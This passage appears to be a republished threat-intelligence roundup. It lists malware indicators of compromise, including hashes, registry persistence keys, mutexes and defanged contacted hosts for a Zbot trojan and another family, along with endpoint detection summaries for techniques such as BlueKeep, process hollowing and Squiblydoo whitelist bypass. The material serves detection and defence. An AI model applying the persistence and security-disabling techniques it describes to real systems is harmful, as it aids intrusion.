0264313435657e607a5edca952c8d6c6b49a067d889ea1b47861eca0c2151bc8 073eca66e8a691e4feb067ea9be6be2f860a37a16c0e4e2d82cbe0d9d6bcf626 10d0eaec661c9ec08bc6b28810666956ac6a76b054de73c6b8de46dec6147de4 1312c2175d4037228e113c1cdb3893484396a4d5c399052543bcd3546908f342 1f1dccb65ab0390f7c11c5d022b19d2a082b7602f09273a7022a9cfaadf703f4 1f22e636178472cd432cf834efadd3f231d868030c640d45bc7b319095f280f9 1f816d531d333287dfd5728657cbb223f891addd28e628fb1cd9bfcfb3216825 2a4dab5fa66737060a150cdab44506efcd2c33651cbe10a383d5a19e41e0ceb2 2cf78102a3bc75a331abf49f6b46fa27546b0a33f4e937e05fed54d53499073c 3a3502534442c75174835e423e8571477269145b153c77b492156a06e9c47f05 3fd16c2e53560649e0b1c79be0e86403887d50588700e66bac1dabbb2b99b753 4fe440cf3713df731f2e7eb210eb70575978821b2862dc7161107d8de197824f 648bbe158a7dafc05b3ac0095ca3eec926970d11054f023c1a4c700069e43883 6e51b6e88a1962263b754210c4eaf76a422575d1b9c8495fa2885f3ccd164a7c 78f418bcdd925f56eabedaae6e092d993a245fde048606a680539cff6bcc54c1 8096baab22457c9fc3087dd93e90a0f4db9be9ecebead32f0f33c965e4b153dc 887cbd08236e1dcdc582789a9fd1122cfe3a2729010a79efd9b48e50d0a290d5 8e8933daed91bf2a385c9c49d572d9102ae959a582e3c6ea81219ef424951f58 99b6a34cb8ad06ca530f7bde87b957c97c1526bb70f0540eba8da58a77b7f319 9b54a9a9fde24c8634c47c950dcb7218d4e1ae1d7c4771f4abd3b92a12e9c686 9d5f6d8d0ed7cf4af9424f57c34d95ba7a59057cc525ac51698d81c85987855a b02eaf95b97c81f56eaddded473b0c66668ff4f55bb84c929c28af1b502b3b7d b8dd63abc6d1dee062cf5f5b68e8e91f748e29c354e19b66d119e04849f51083 bdf44a59073f52b5b4bada6afbeccd9410ce8ca0a46441149b66d4b97b305572 d90afab18a64702ce68aae194c7e73833ab8329e8e9f89013b0195b13123b2ec
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Trojan.Zbot-8013884-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 32 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: DisableSR
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
6
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 2c8e14e
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: *c8e14e
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 2c8e14ef
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: *c8e14ef
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
Value Name: Start
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WERSVC
Value Name: Start
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
6
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
Value Name: Blob
6
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {32382BC4-48A5-6DE8-F0EE-B8109DEC3228}
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}\1 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}\2 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 2
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 1
1
<HKCR>\CLSID\{336F6FFD-1E87-0F7A-E3F2-4116F584449F}
Value Name: 0
1
Mutexes Occurrences
qazwsxedc 16
Global\<random guid> 7
{D40826B6-6DEA-3FD2-F3F9-B38D55A50621} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
74[.]220[.]199[.]6 6
23[.]227[.]38[.]32 6
23[.]20[.]239[.]12 6
184[.]168[.]131[.]241 6
184[.]106[.]112[.]172 6
198[.]71[.]233[.]163 6
173[.]201[.]222[.]106 6
198[.]57[.]151[.]37 6
184[.]106[.]55[.]91 6
199[.]34[.]229[.]100 6
46[.]32[.]240[.]33 6
107[.]180[.]55[.]15 6
66[.]34[.]140[.]40 6
173[.]201[.]244[.]70 6
94[.]73[.]147[.]76 6
107[.]180[.]44[.]157 6
73[.]84[.]65[.]58 6
111[.]223[.]233[.]27 6
154[.]206[.]118[.]131 6
13[.]235[.]208[.]245 6
103[.]37[.]9[.]144 6
216[.]239[.]38[.]21 3
50[.]63[.]202[.]49 3
50[.]63[.]202[.]34 3
216[.]239[.]34[.]21 2
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]hugedomains[.]com 6
myexternalip[.]com 6
ip-addr[.]es 6
be-practical[.]com 6
blackrabbitartdesign[.]com 6
brascoder[.]com 6
bullsfx[.]com 6
beijosnaboca[.]com 6
biologicalhealthservices[.]com[.]au 6
byourverynature[.]com 6
cafghanc[.]com 6
asrparts[.]com 6
brycedoersam[.]com 6
apmanages[.]com 6
begginsreferralnetwork[.]com 6
bodychargenutrition[.]com 6
babytravelblog[.]com 6
bugnoutapreppersparadise[.]com 6
appeum[.]com 6
buycarbontubes[.]com 6
aslikarabulut[.]com 6
bowlsshirts[.]com 6
c21brn[.]com 6
avalonmakeupartists[.]com 6
buyhusqvarnamowers[.]com 6
*See JSON for more IOCs
Files and or directories created Occurrences
\4930e6be\4930e6be.exe 6
%APPDATA%\4930e6be.exe 6
%HOMEPATH%\Start Menu\Programs\Startup\4930e6be.exe 6
\2c8e14ef 6
\2c8e14ef\2c8e14ef.exe 6
%APPDATA%\2c8e14ef.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2c8e14ef.exe 6
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startupx\system.pif 5
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt 5
%HOMEPATH%\Start Menu\Programs\Startupx\system.pif 4
%TEMP%\bwdbyp.ifq 4
%TEMP%\mlgm.mcs 4
%SystemRoot%\gss.cbr 3
%SystemRoot%\psj.flp 3
%System32%\drivers\etc\hosts 1
%TEMP%\9D3A.dmp 1
%System32%\Tasks\{336F6FFD-1E87-0F7A-E3F2-4116F584449F} 1
%SystemRoot%\Tasks\{B1848E98-8BF6-84BE-2D84-8DA4C5726179}.job 1
%TEMP%\A02CE.dmp 1
%APPDATA%\RhehnPcU 1
%APPDATA%\RhehnPcU\PzWtYTmF 1
%APPDATA%\RhehnPcU\PzWtYTmF\rEQTeLRe 1
%APPDATA%\RhehnPcU\PzWtYTmF\rEQTeLRe\QlZPaxxwp.exe 1
%APPDATA%\EfXYzYVl\RxdBjjMs\nJMxbUsW\vORDaycmX.exe 1

File Hashes

01f24045d18c966d195d0934ac6bc801652a5908a9ef50124c0557f6d03d42c3 058051ccc05ed076f17535e744f385290eda9c2e0912ed7c460e5b571b3e26dc 0649a007c9e7e7abc08fcfa53cfbc0a11c3119792b04d2ff6a47f8f53cdc5514 07905ece0c4747aad1bf4b7f11693e319140a4e55f1b40308209f4ccf3c16dfb 0b9297a648aba6ee27b8a96cc95974be328547141e1b5a3e13e544f71bc045e0 0e475d4c0f6ff5e453668f962c6a7d78d218582a46d3d2f7ab36b221face4631 115dd57d8c7887820eba732e628879f34693791da1cc8f4b270ef954e8a56b2b 2240fb081176a4811088f5818d0b5d6a60a2ffd64a8202fdd46b4e05f694ac2d 258b78459aad9222ce31fd3c6a7fa2fe202c0a29e4299b7f0ff9be373ef72670 2760e4f5c5119988b6c83907da6a3cf60e62c2425456ebf1e06893a00c04b91b 29114a3a6b05e119245d93373f8776a086a9018016238a3300ed93700d7f2f32 29561a21de4d716de129ff67f4504feee5232e932dc7925d8acf2fd6220b7ba6 2e8882116694efbb6b57355f7f3e6b79b77cfbae42b5204b3d3172497f7e327d 356b7cfcc87425f08c9ad492d272b5ac6e0476389193c20ebd37cf95e1215825 3988dc9a3f05c928110f69bd750b6d6ac7fa233e6ef072463f82fea877a0ad7c 476ce28be8b7576a3b0576e7dd8f90f2aa1cfc59ad90adb5abf14a9d5d866b84 498438a69aa744934cd33f6219709b3fb1531e3e89e95cef805f494ba8be938b 4de13fa0580a6f7f315652cfe448493336db4cbcbcc31fa15caf5016ce11aa72 4ea79444f67c2c5ef753e785887a9181ae17eb984c7f37a3113cad6a2b2e6ccd 4fbf3416adf96620028b3f92f661d24708aff0c83651868dddbbddae11110b9d 5c0c7d1e7e52685b82c1d170368db66fbfbe06ab3e05c7a8243d9bad5500a64c 5d2659b94c16fc1db20e20a1110426bc3a5cf29904cfe49ac381de573c8d6135 5e15c7ef36f861bd967c4b7cf7b4476d37be287e3b1e18cc41168810b9e36f3f 60d3892006ae9dece5a967e4023c664437fff4d3662b47a01738cebda1b1446d 67187b9ebc578ae12c06cddff756160d741eafd53440efd6756c646e4d9e7594
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (5183)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (4194)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (2660)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Process hollowing detected - (1276)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Installcore adware detected - (253)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (141)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application whitelist bypass attempt detected. - (136)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Gamarue malware detected - (79)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
A Microsoft Office process has started a windows utility. - (41)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
IcedID malware detected - (37)
IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.